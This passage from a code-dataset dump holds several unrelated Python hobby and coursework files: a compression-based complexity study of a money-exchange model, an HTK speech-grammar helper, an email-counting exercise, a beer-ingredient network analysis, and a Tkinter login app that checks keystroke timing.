{sweepstotal + stepsize} out of {NSweeps}\\r\", end = \"\")\r\n zlibCIDs[istep], gzipCIDs[istep], lz4CIDs[istep], lzmaCIDs[istep] = CIDSweepMean(money,DeltaMax,math.floor(stepsize/stepstepsize),stepstepsize)\r\n sweepstotal += stepsize\r\n istep += 1\r\n plt.figure(1)\r\n plt.subplot(1,2,1)\r\n YakovenkoPlot(money,N,sweepstotal,binsize,moneyint,DeltaMax)\r\n plt.subplot(1,2,2)\r\n plt.plot(nsweeparray,zlibCIDs,label=\"zlib\")\r\n plt.plot(nsweeparray,gzipCIDs,label=\"gzip\")\r\n plt.plot(nsweeparray,lz4CIDs,label=\"lz4\")\r\n plt.plot(nsweeparray,lzmaCIDs,label=\"lzma\")\r\n plt.title(\"CID over time of the model\")\r\n plt.xlabel(f\"Number of Yakovenko iterations/{N}\")\r\n plt.ylabel(f\"CID averaged over {math.floor(stepsize/stepstepsize)} steps of size {stepstepsize}\")\r\n plt.legend()\r\n plt.show()\r\n \r\ndef CIDSweepMean(money, DeltaMax, steps, stepsize, zliblevel = -1, gziplevel = 9, discrete = False):\r\n # Applies steps * stepsize sweeps of size len(money) and calculates the average CID of all steps\r\n \r\n N = len(money)\r\n zlibCIDs = [0]*steps\r\n gzipCIDs = [0]*steps\r\n lz4CIDs = [0]*steps\r\n lzmaCIDs = [0]*steps\r\n istep = 0\r\n while(istep < steps):\r\n YakovenkoIters(stepsize*N, money, DeltaMax, discrete)\r\n zlibCIDs[istep], gzipCIDs[istep], lz4CIDs[istep], lzmaCIDs[istep] = CIDs(money, zliblevel, gziplevel, discrete)\r\n istep += 1\r\n return sum(zlibCIDs)/steps, sum(gzipCIDs)/steps, sum(lz4CIDs)/steps, sum(lzmaCIDs)/steps\r\n \r\n\r\ndef CIDsNotConverged(zlibCIDs, gzipCIDs, lz4CIDs, lzmaCIDs, CIDConstraint = 0.02):\r\n # an attempt at trying a constraint on the CID being converged\r\n \r\n if zlibCIDs == False or gzipCIDs == False or lz4CIDs == False or lzmaCIDs == False:\r\n return True\r\n return ((max(zlibCIDs) - min(zlibCIDs)) > CIDConstraint) or ((max(gzipCIDs) - min(gzipCIDs)) > CIDConstraint) or ((max(lz4CIDs) - min(lz4CIDs)) > CIDConstraint) or ((max(lzmaCIDs) - min(lzmaCIDs)) > CIDConstraint)\r\n \r\ndef CIDs (money, zliblevel = -1, gziplevel = 9, discrete = False):\r\n # the actual CID calculation happens here\r\n \r\n if discrete:\r\n buf = struct.pack(f'{len(money)}I', *money)\r\n else:\r\n money2 = [round(x) for x in money]\r\n buf = struct.pack(f'{len(money)}I', *money2) # needs to be int for a nice compression\r\n # if I really want to be exact I can do this instead of rounding, I don't think it's worthwhile though:\r\n # moneynumerator = [0]*len(money)\r\n # moneydivisor = [0]*len(money)\r\n # for i in len(money)\r\n # moneynumerator[i], moneydivisor[i] = money[i].as_integer_ratio()\r\n # div = max(moneydivisor)\r\n # moneydiscr = [(div * moneynumerator[i])//moneydivisor[i] for i in len(money)]\r\n zlibCIDv = len(zlib.compress(buf,zliblevel))/len(buf)\r\n gzipCIDv = len(gzip.compress(buf,gziplevel))/len(buf)\r\n lz4CIDv = len(lz4.frame.compress(buf))/len(buf)\r\n lzmaCIDv = len(lzma.compress(buf))/len(buf)\r\n return zlibCIDv, gzipCIDv, lz4CIDv, lzmaCIDv\r\n\r\n \r\n \r\ndef zlibCID (bbytes, level = -1):\r\n return len(zlib.compress(bbytes,level))/len(bbytes)\r\n \r\ndef gzipCID (bbytes,compresslevel = 9):\r\n return len(gzip.compress(bbytes,compresslevel))/len(bbytes)\r\n \r\ndef lz4CID (bbytes):\r\n return len(lz4.frame.compress(bbytes))/len(bbytes)\r\n \r\ndef lzmaCID (bbytes):\r\n return len(lzma.compress(bbytes))/len(bbytes)\r\n\r\n\r\ndef BoltzmannHist(x,binsize,moneyint,N):\r\n return N*(1 - np.exp(-binsize/moneyint))*np.exp(-(x - binsize/2)/moneyint)\r\n\r\ndef BoltzmannHistPlot(moneyint,maxmoney,N,binsize,figure=None):\r\n if figure != None: \r\n plt.figure(figure)\r\n x = np.arange(0.0,maxmoney+binsize,binsize/4)\r\n y = BoltzmannHist(x,binsize,moneyint,N)\r\n plt.plot(x,y)\r\n \r\n \r\n\r\ndef YakovenkoPlot(money,N,NSweepstotal,binsize,moneyint,DeltaMax,figure=None,boltzmanndistr=True):\r\n #A script that plots the basic Yakovenko distribution\r\n \r\n if figure != None: \r\n plt.figure(figure)\r\n plt.hist(money, bins=np.arange(0,max(money)+ binsize,binsize))\r\n plt.title(f\"Histogram of N = {N} agents after {NSweepstotal}$\\cdot N$ Yakovenko iterations\")\r\n plt.xlabel(f\"Money ($m_0 = ${moneyint}, $\\Delta_{{max}} = ${DeltaMax})\")\r\n plt.ylabel(\"Amount of agents\") \r\n if boltzmanndistr == True:\r\n BoltzmannHistPlot(moneyint,max(money),N,binsize)\r\n \r\n \r\n \r\ndef YakovenkoIter(money, DeltaMax, discrete = False):\r\n #A script that does a single Yakovenko itration on money\r\n \r\n N = len(money)\r\n i = random.randrange(N)\r\n j = random.randrange(N)\r\n while i == j:\r\n j = random.randrange(N)\r\n if discrete and DeltaMax == 1:\r\n Delta = 1\r\n elif discrete:\r\n Delta = random.randint(1,DeltaMax)\r\n else:\r\n Delta = random.uniform(0,DeltaMax)\r\n if money[i] >= Delta:\r\n money[i] = money[i] - Delta\r\n money[j] = money[j] + Delta\r\n \r\n\r\ndef YakovenkoIters(NIters, money, DeltaMax, discrete = False):\r\n #A script that does multiple yakovenko iterations on money \r\n \r\n for i in range(NIters):\r\n YakovenkoIter(money, DeltaMax, discrete)\r\n\r\n\r\ndef ShannonEntropy(money):\r\n #A simple shannon entropy calculation \r\n \r\n N = math.ceil(max(money))\r\n S = 0\r\n for i in range(N):\r\n l = 0\r\n for x in money:\r\n if i <= x and x < i + 1:\r\n l += 1\r\n if l != 0:\r\n p = l / len(money)\r\n S += -p * math.log2(p)\r\n return S\r\n\r\n# def ShannonEntropy (money, bins = 25):\r\n # hist, edges = np.histogram(money, bins)\r\n # hist = hist/hist.sum()\r\n # ent = 0\r\n # for bin in hist:\r\n # ent += -bin*math.log2(bin)\r\n\r\n\r\n \r\n\r\n\r\n\r\n# def sweepsim (N = 1000, Nsweeps = 10, moneyint = 100, DeltaMax = 1):\r\n # money = [moneyint]*N\r\n # sweeps (money, Nsweeps, DeltaMax)\r\n # plt.hist(money, bins=25)\r\n # plt.title(\"Histogram of N = \"+str(N)+\" agents after \"+str(Nsweeps)+\" sweeps\")\r\n # plt.xlabel(\"Money ($m_i = $\"+str(moneyint)+\", $\\Delta_{max} = $\"+str(DeltaMax)+\")\")\r\n # plt.ylabel(\"Amount of agents\")\r\n # plt.show()\r\n \r\n \r\n \r\n \r\n\r\n# def sweep (money, DeltaMax):\r\n # N = len(money)\r\n # givers = list(range(N))\r\n # random.shuffle(givers)\r\n ## there's a possibility of money being exchanged from and to the same agent\r\n ## the thesis is unclear on whether this is supposed to happen\r\n # for i in range(N):\r\n # Delta = random.uniform(0,DeltaMax)\r\n # if money[givers[i]] >= Delta:\r\n # money[givers[i]] = money[givers[i]] - Delta\r\n # money[i] = money[i] + Delta\r\n \r\n \r\n \r\n\r\n# def sweeps (money, Nsweeps, DeltaMax):\r\n # for n in range(Nsweeps):\r\n # sweep (money, DeltaMax)\r\n \r\n","sub_path":"CIDs.py","file_name":"CIDs.py","file_ext":"py","file_size_in_byte":15682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"414177506","text":"\r\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DESCRIPTION %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n# \r\n# This script is intended to act as a module with different functions:\r\n# - Create pre-grammar files (needed prior grammar stage).\r\n# - Carry out the grammar stage.\r\n\r\n\r\n# Note: information about this htk-procedure in the htk book.\r\n\r\n#------------------------------------------------------------------------------------------------------------------\r\n# Authors:\r\n# - Main programmer: Salvador Florido Llorens\r\n# - Main Supervisor: Ignacio Moreno Torres\r\n# - Second Supervisor: Enrique Nava Baro\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% EXAMPLE OF USE %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\n# sys.path.insert(0, 'htk/Modulos_python')\r\n# import HTK_gram.py\r\n#\r\n# fillGram (labList, dir)\r\n\r\n\r\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% IMPORT PACKAGES %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\n\r\nimport subprocess\r\n\r\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% MAIN FUNCTIONS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\n\r\ndef fillGram (labList, dir):\r\n\r\n strTemp=\"$name = \"\r\n for indlab in range(len(labList)):\r\n \tif indlab==0:\r\n \t\tstrTemp=strTemp+labList[indlab]\r\n \telse:\r\n \t\tstrTemp=strTemp+\"|\"+labList[indlab]\r\n\r\n strGram=strTemp+\";\\n(silence $name silence)\"\r\n\r\n with open(dir,'w+') as fileW:\r\n \tfileW.write(strGram)\r\n\r\n return;\r\n\r\ndef gram():\r\n cmd = 'HParse Gramatica/gram.htk Gramatica/wdnet.htk'\r\n failure = subprocess.call(cmd, shell=True)\r\n print ('Gramatica Hecha')\r\n\r\n return;","sub_path":"htk/Modulos_python/HTK_gram.py","file_name":"HTK_gram.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"429606206","text":"# Open file\nfname = input('Enter File Name: ')\ntry:\n if len(fname) < 1: fname = 'mbox-short.txt'\n handle = open(fname)\nexcept:\n print(\"Invalid Input\")\n quit()\n\n# Extracting email lists and counts\ndic = dict()\nlst = list()\nfor line in handle:\n line = line.strip()\n words = line.split()\n if len(words) < 3:\n continue\n if words[0] == 'From':\n lst.append(words[1])\nfor word in lst:\n dic[word] = dic.get(word, 0) + 1\n\n# For loop to find most common words\nlargest = -1\nemail = None\nfor k, v in dic.items():\n if v > largest:\n largest = v\n email = k\n\nprint(email, largest)\n","sub_path":"PythonC2/ex_09_05_retry.py","file_name":"ex_09_05_retry.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"93214168","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 27 12:56:40 2017\n\n@author: HEUM\n\"\"\"\n\nimport networkx as nx\nimport numpy as np\n\nbipartite_graph=nx.read_gexf('gexf/modern_bipartite.gexf')\n\nbeer=set(n for n,d in bipartite_graph.nodes(data=True) if d['bipartite']=='beer')\ningredients=set(n for n,d in bipartite_graph.nodes(data=True) if d['bipartite']=='ingredient')\ncuisines=['England','Asia','Europe']\n\ngraphs=dict.fromkeys(cuisines)\nfor c in cuisines:\n #graphs[c]=nx.read_gexf('gexf/modern_bipartite_%s.gexf' % c)\n graphs[c]=nx.read_gexf('gexf/modern_bipartite.gexf')\n\nprevalence_dict={}\n\nfor c in cuisines:\n prevalence_dict[c]=dict.fromkeys(ingredients)\n \n # N: # of total number of recipes\n N=len(set(n for n,d in graphs[c].nodes(data=True) if d['bipartite']=='beer'))\n \n for i in ingredients:\n # n_i: # of recipes with the ingredient i\n n_i=nx.degree(graphs[c], i)\n \n prevalence = float(n_i) / float(N)\n \n prevalence_dict[c][i]=prevalence\n\nauthenticity_dict=dict.fromkeys(cuisines)\n\nfor c in cuisines:\n authenticity_dict[c]=dict.fromkeys(ingredients)\n for i in ingredients:\n other_prevalences=[]\n for c_other in cuisines:\n if not c_other == c:\n other_prevalences.append(prevalence_dict[c_other][i])\n prevalence=prevalence_dict[c][i]\n \n authenticity = prevalence - np.mean(other_prevalences)\n authenticity_dict[c][i] = authenticity","sub_path":"bipartite-network/prevalence_authenticity_analysis.py","file_name":"prevalence_authenticity_analysis.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"547945171","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 12 12:26:52 2018\r\n\r\n@author: Saumya\r\n\"\"\"\r\nimport cv2\r\nimport openpyxl\r\nfrom tkinter import *\r\nfrom time import time\r\nfrom PIL import Image,ImageTk\r\n\r\nglobal j\r\nj=0\r\nglobal y\r\ny=1\r\nglobal z\r\nz=0\r\nglobal l\r\nl=0\r\nglobal p\r\np=0\r\nglobal m\r\nm=0\r\n\r\ndef wel():\r\n global roots\r\n global l\r\n global m\r\n global p\r\n global roott\r\n global k\r\n global r1\r\n global z\r\n \r\n if z==1:\r\n r.destroy()\r\n \r\n if l==1:\r\n roott.destroy()\r\n \r\n if p==1:\r\n r1.destroy()\r\n \r\n if m==1:\r\n roots.destroy()\r\n \r\n #print(\"hello\")\r\n roots = Tk()\r\n \r\n k=0\r\n z=0\r\n l=0\r\n p=0\r\n m=0\r\n w=800\r\n h=600\r\n width,height=roots.winfo_screenwidth(),roots.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n roots.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n roots.configure(bg=\"#90C3C8\")\r\n roots.title('WELCOME')\r\n \r\n intruction = Label(roots,font=(\"Poor Richard\",40), text=' WELCOME\\n',highlightthickness=5,highlightbackground=\"black\",bg=\"#90C3C8\")\r\n intruction.grid(row=0, column=0,padx=10,pady=2, sticky=N+S)\r\n\r\n loginB = Button(roots, text='Login', command=Login,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n loginB.place(relx=.41,rely=.3)\r\n \r\n signupB = Button(roots, text='Signup', command=Signup,fg=\"black\",bg=\"#EA7317\",height=3,width=20) \r\n signupB.place(relx=.41,rely=.5)\r\n \r\n analysisB = Button(roots, text='Analysis', command=analysis,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n analysisB.place(relx=.41,rely=.7)\r\n \r\n roots.mainloop()\r\n\r\ndef Login():\r\n global pwordE\r\n global nameE\r\n global roots\r\n global k\r\n global m\r\n \r\n if k==0:\r\n roots.destroy()\r\n \r\n roots = Tk()\r\n m=1\r\n w=800\r\n h=600\r\n width,height=roots.winfo_screenwidth(),roots.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n roots.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n roots.configure(bg=\"#A0CCDA\")\r\n roots.title('LOGIN')\r\n intruction = Label(roots,font=(\"Poor Richard\",40), text=' Login\\n',highlightthickness=5,highlightbackground=\"black\",bg=\"#A0CCDA\")\r\n intruction.grid(row=0, column=0,padx=10,pady=2, sticky=N+S)\r\n\r\n\r\n nameL = Label(roots,font=(\"\",20), text='Username :: ',highlightthickness=5,bg=\"#A0CCDA\")\r\n nameL.place(relx=.2,rely=.25)\r\n\r\n nameE = Entry(roots,bg=\"lightgrey\",highlightthickness=2,highlightbackground=\"grey\")\r\n nameE.place(relx=0.5,rely=0.28)\r\n\r\n loginB = Button(roots, text='confirm', command=gett,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n loginB.place(relx=.42,rely=.6)\r\n \r\n backB = Button(roots, text='Back', command=wel,fg=\"black\",bg=\"#EA7317\",height=2,width=10)\r\n backB.place(relx=.6,rely=.9)\r\n \r\n roots.mainloop()\r\n \r\ndef gett():\r\n global rot\r\n global roots\r\n global counter\r\n global chk\r\n global cmp\r\n global totaltime\r\n rot=Tk()\r\n w=800\r\n h=600\r\n width,height=rot.winfo_screenwidth(),rot.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n rot.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n rot.configure(bg=\"#A0CCDA\")\r\n\r\n mylist = []\r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n rows=ws.max_row\r\n for i in range(1,rows+1):\r\n mylist.extend([ws.cell(row=i,column=1).value])\r\n\r\n pwordL = Label(rot,font=(\"\",20), text='Password :: ',highlightthickness=5,bg=\"#A0CCDA\")\r\n pwordL.place(relx=.2,rely=.25)\r\n pwordE = Entry(rot,bg=\"lightgrey\",highlightthickness=2,highlightbackground=\"grey\",show='*')\r\n pwordE.place(relx=0.5,rely=0.28)\r\n tw=pwordE.get()\r\n name=nameE.get()\r\n\r\n if name in mylist:\r\n print=\"bye\"\r\n counter=mylist.index(name)\r\n counter+=1\r\n cmp=ws.cell(row=counter,column=2).value\r\n\r\n roots.destroy()\r\n\r\n loginB = Button(rot, text='Login', command=CheckLogin,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n loginB.place(relx=.42,rely=.6)\r\n def logg(keyevent):\r\n global totaltime\r\n cword = cmp\r\n cwordsize = len(cword)\r\n cwordlist = tuple(cword)\r\n cwordfl = str(cwordlist[0])\r\n cwordll = str(cwordlist[-1])\r\n\r\n tword = pwordE.get()\r\n twordsize = len(tword)\r\n if twordsize > 0:\r\n twordlist = tuple(tword)\r\n twordfl = str(twordlist[0])\r\n twordll = str(twordlist[-1])\r\n if cwordsize == 1 and twordsize == 1:\r\n print(\"more letters\")\r\n if twordsize == 1 and cwordsize > 1:\r\n global start\r\n start = time()\r\n if twordsize == cwordsize and twordsize != 1:\r\n if cwordll == twordll:\r\n stop = time()\r\n totaltime = stop - start\r\n \r\n new_col=[tword]\r\n file='data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n col=11\r\n for row, entry in enumerate(new_col, start=1):\r\n ws.cell(row=counter, column=col, value=entry)\r\n\r\n wb.save(file)\r\n wb.close()\r\n\r\n pwordE.bind('', logg)\r\n\r\ndef CheckLogin():\r\n ##############################\r\n global cmp\r\n global totaltime\r\n rot.destroy()\r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n tw=ws.cell(row=counter,column=11).value\r\n t1=ws.cell(row=counter,column=9).value\r\n t2=ws.cell(row=counter,column=10).value\r\n print(\"time\",totaltime)\r\n if tw == cmp and t1<=totaltime and totaltime<=t2:\r\n global z\r\n z=1\r\n global m\r\n m=0\r\n \r\n global r\r\n global user\r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n user=ws.cell(row=counter,column=1).value\r\n \r\n r = Tk()\r\n w=700\r\n h=550\r\n width,height=r.winfo_screenwidth(),r.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n r.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n r.configure(bg=\"#A0CCDA\")\r\n r.title(':D')\r\n \r\n rlbl = Label(r,font=(\"Poor Richard\",30),text='\\n Hello {}'.format(user),bg=\"#A0CCDA\")\r\n rlbl.pack()\r\n \r\n analysisB = Button(r, text='Log Out', command=wel,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n analysisB.place(relx=.6,rely=.85)\r\n \r\n loginB = Button(r, text='CheckIntruders',command=CheckIntruder, fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n loginB.place(relx=.4,rely=.4)\r\n \r\n r.mainloop()\r\n else:\r\n global p\r\n \r\n \r\n p=1\r\n \r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n use=ws.cell(row=counter,column=1).value\r\n \r\n cam = cv2.VideoCapture(0) \r\n ret, frame = cam.read()\r\n \r\n img_name = \"pic_{}.png\".format(use)\r\n cv2.imwrite(img_name, frame)\r\n cam.release()\r\n\r\n global r1\r\n r1 = Tk()\r\n w=600\r\n h=450\r\n width,height=r1.winfo_screenwidth(),r1.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n r1.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n r1.configure(bg=\"#A0CCDA\")\r\n r1.title(':D')\r\n \r\n rlbl = Label(r1,font=(\"Poor Richard\",40),text='\\nInvalid \\n Login',bg=\"#A0CCDA\")\r\n rlbl.pack()\r\n \r\n logoutB = Button(r1, text='Exit', command=close,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n logoutB.place(relx=.6,rely=.85)\r\n \r\n r1.mainloop()\r\n\r\ndef close():\r\n global r1\r\n r1.destroy()\r\ndef display():\r\n global root \r\n root.destroy()\r\n \r\n global r\r\n global m\r\n m=0\r\n global z\r\n z=1\r\n global user\r\n \r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n user=ws.cell(row=counter,column=1).value\r\n \r\n r = Tk()\r\n w=700\r\n h=550\r\n width,height=r.winfo_screenwidth(),r.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n r.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n r.configure(bg=\"#A0CCDA\")\r\n r.title(':D')\r\n \r\n rlbl = Label(r,font=(\"Poor Richard\",30),text='\\n[+] Logged In',bg=\"#A0CCDA\")\r\n rlbl.pack()\r\n \r\n analysisB = Button(r, text='Log Out', command=wel,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n analysisB.place(relx=.6,rely=.85)\r\n \r\n loginB = Button(r, text='CheckIntruders',command=CheckIntruder, fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n loginB.place(relx=.4,rely=.4)\r\n \r\n r.mainloop()\r\ndef CheckIntruder():\r\n global r\r\n r.destroy()\r\n \r\n global root\r\n root=Tk()\r\n frame1 = Frame(root)\r\n frame1.pack(side=TOP, fill=X)\r\n \r\n photo1 = PhotoImage(file=\"pic_{}.png\".format(user))\r\n \r\n button1 = Button(frame1, compound=TOP, image=photo1,font=(\"\",17),text=\"Back\",fg=\"white\", bg='Black', command=display)\r\n button1.pack()\r\n \r\n button1.image = photo1\r\n \r\n root.mainloop()\r\n\r\ndef Signup():\r\n global nameEL\r\n global pwordEL\r\n global emailEL\r\n global mobEL\r\n global ageEL\r\n global rootA\r\n global roots\r\n global rows\r\n\r\n roots.destroy()\r\n fields = 'Username', 'Password', 'Email', 'Mob','Age'\r\n def fetch(entries):\r\n file = 'data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n rows=ws.max_row\r\n rows+=1\r\n\r\n col=0\r\n\r\n for entry in entries:\r\n text = entry[1].get()\r\n\r\n new_col = [text]\r\n\r\n col+=1\r\n\r\n for row, entry in enumerate(new_col, start=1):\r\n ws.cell(row=rows, column=col, value=entry)\r\n\r\n wb.save(file)\r\n\r\n def makeform(root, fields):\r\n entries = []\r\n for field in fields:\r\n row = Frame(rootA)\r\n lab = Label(row, width=35,font=(\"\",13), text=field+\" ::\", anchor='w',bg=\"#90C3C8\")\r\n ent = Entry(row)\r\n row.pack(side=TOP, fill=Y, padx=5, pady=5)\r\n lab.pack(side=LEFT)\r\n ent.pack(side=RIGHT, expand=YES, fill=Y)\r\n entries.append((field, ent))\r\n return entries\r\n\r\n if __name__ == '__main__':\r\n fields = 'Username', 'Password', 'Email', 'Mob','Age'\r\n rootA = Tk()\r\n w=800\r\n h=600\r\n width,height=rootA.winfo_screenwidth(),rootA.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n rootA.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n rootA.configure(bg=\"#90C3C8\")\r\n\r\n rootA.title('SIGN-UP')\r\n intruction = Label(rootA,font=(\"\",20), text='Please Enter Credentials\\n',bg=\"#90C3C8\")\r\n intruction.pack(side=LEFT, padx=5, pady=5)\r\n ents = makeform(rootA, fields)\r\n rootA.bind('', (lambda event, e=ents: fetch(e)))\r\n\r\n b2 = Button(rootA, text='Next',command=combine_funcs((lambda e=ents: fetch(e)), sign),fg=\"black\",bg=\"#EA7317\",height=3,width=10)\r\n b2.place(relx=0.42,rely=0.8)\r\n\r\n rootA.mainloop()\r\n\r\ndef combine_funcs(*funcs):\r\n def combined_func(*args, **kwargs):\r\n for f in funcs:\r\n f(*args, **kwargs)\r\n return combined_func\r\n\r\ndef sign():\r\n rootA.destroy()\r\n pas()\r\n\r\ndef DelUser():\r\n rootA.destroy()\r\n Login()\r\ndef paes():\r\n global roots\r\n roots.destroy()\r\n pas()\r\ndef exi():\r\n global roots\r\n roots.destroy()\r\n Login()\r\n\r\ndef pas():\r\n global j\r\n j+=1\r\n global roots\r\n\r\n roots = Tk()\r\n w=700\r\n h=500\r\n width,height=roots.winfo_screenwidth(),roots.winfo_screenheight()\r\n x=(width/2)-(w/2)\r\n y=(height/2)-(h/2)\r\n roots.geometry('%dx%d+%d+%d'%(w,h,x,y))\r\n roots.configure(bg=\"#A0CCDA\")\r\n roots.title('LOGIN')\r\n \r\n intruction = Label(roots,font=(\"Poor Richard\",30), text=' CONFIRM PASSWORD \\n',highlightthickness=5,highlightbackground=\"black\",bg=\"#A0CCDA\")\r\n intruction.grid(row=0, column=0,padx=10,pady=2, sticky=N+S)\r\n \r\n w1 = Label(roots,font=(\"\",20), text='Password :: ',highlightthickness=5,bg=\"#A0CCDA\") \r\n w1.grid(row=3, column=0,padx=10,pady=2, sticky=N+S) \r\n \r\n we = Entry(roots,bg=\"lightgrey\",highlightthickness=2,highlightbackground=\"grey\")\r\n we.grid(row=3, column=1,padx=10,pady=2, sticky=N+S)\r\n \r\n wb = openpyxl.load_workbook('data.xlsx')\r\n ws = wb['Sheet1']\r\n for row in ws.iter_rows('B{}:B{}'.format(ws.min_row,ws.max_row)):\r\n for cell in row:\r\n continue\r\n ce=cell.value\r\n sheet = wb.active\r\n\r\n def pressed(keyevent):\r\n cword = ce\r\n cwordsize = len(cword)\r\n cwordlist = tuple(cword)\r\n cwordfl = str(cwordlist[0])\r\n cwordll = str(cwordlist[-1])\r\n\r\n tword = we.get()\r\n twordsize = len(tword)\r\n if twordsize > 0:\r\n twordlist = tuple(tword)\r\n twordfl = str(twordlist[0])\r\n twordll = str(twordlist[-1])\r\n if cwordsize == 1 and twordsize == 1:\r\n print(\"more letters\")\r\n if twordsize == 1 and cwordsize > 1:\r\n global start\r\n start = time()\r\n if twordsize == cwordsize and twordsize != 1:\r\n if cwordll == twordll:\r\n stop = time()\r\n totaltime = stop - start\r\n print(\"time=\",totaltime)\r\n file = 'data.xlsx'\r\n new_col = [totaltime]\r\n\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n rows = ws.max_row\r\n if j==1:\r\n col = 6\r\n if j==2:\r\n col = 7\r\n if j==3:\r\n col = 8\r\n\r\n\r\n for row, entry in enumerate(new_col, start=1):\r\n ws.cell(row=rows, column=col, value=entry)\r\n\r\n wb.save(file)\r\n wb.close()\r\n\r\n we.bind('', pressed)\r\n \r\n if j<3:\r\n okButton = Button(roots, text='Confirm', command=paes,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n okButton.place(relx=.42,rely=.6)\r\n\r\n else:\r\n ekButton = Button(roots, text='End', command=cal,fg=\"black\",bg=\"#EA7317\",height=3,width=20)\r\n ekButton.place(relx=.42,rely=.6)\r\n\r\ndef cal():\r\n global k\r\n j=0\r\n if j==0:\r\n global roots\r\n \r\n wb = openpyxl.load_workbook('data.xlsx')\r\n ws = wb['Sheet1']\r\n rows=ws.max_row\r\n sum=0\r\n sheet = wb.active\r\n for col in ws.iter_cols(min_row=rows,max_row=rows,min_col=6,max_col=8):\r\n for cell in col:\r\n sum=sum+cell.value\r\n \r\n avg=sum/3\r\n minavg=avg-0.3\r\n max_avg=avg+0.3\r\n print(\"min=\",minavg)\r\n print(\"max=\",max_avg)\r\n new_col = [minavg]\r\n file='data.xlsx'\r\n wb = openpyxl.load_workbook(filename=file)\r\n ws = wb[\"Sheet1\"]\r\n col=9\r\n for row, entry in enumerate(new_col, start=1):\r\n ws.cell(row=rows, column=col, value=entry)\r\n new_col = [max_avg]\r\n col=10\r\n for row, entry in enumerate(new_col, start=1):\r\n ws.cell(row=rows, column=col, value=entry)\r\n \r\n wb.save(file)\r\n wb.close()\r\n \r\n j=1\r\n if j==1:\r\n k=1\r\n roots.destroy()\r\n Login()\r\n\r\n\r\ndef analysis():\r\n global roots \r\n roots.destroy()\r\n global roott\r\n global l\r\n roott = Tk()\r\n l=1\r\n \r\n frame1 = Frame(roott)\r\n frame1.pack(side=TOP, fill=X)\r\n \r\n photo1 = PhotoImage(file=\"analyy.png\")\r\n \r\n button1 = Button(frame1, compound=BOTTOM, image=photo1,font=(\"\",17),text=\"Back\", bg='green', command=wel)\r\n button1.pack()\r\n\r\n button1.image = photo1\r\n \r\n roott.mainloop()\r\n \r\n\r\nwel()\r\n","sub_path":"Password Pattern Recognition.py","file_name":"Password Pattern Recognition.py","file_ext":"py","file_size_in_byte":15969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"440854441","text":"from socket import *\nimport json\n\ndef cria_cliente(ip, porta):\n\t\"\"\"\n\tCriamos o socket e o conectamos ao servidor \n\t\"\"\"\t\n\tip = str(ip)\n\tglobal sockobj\n\tsockobj 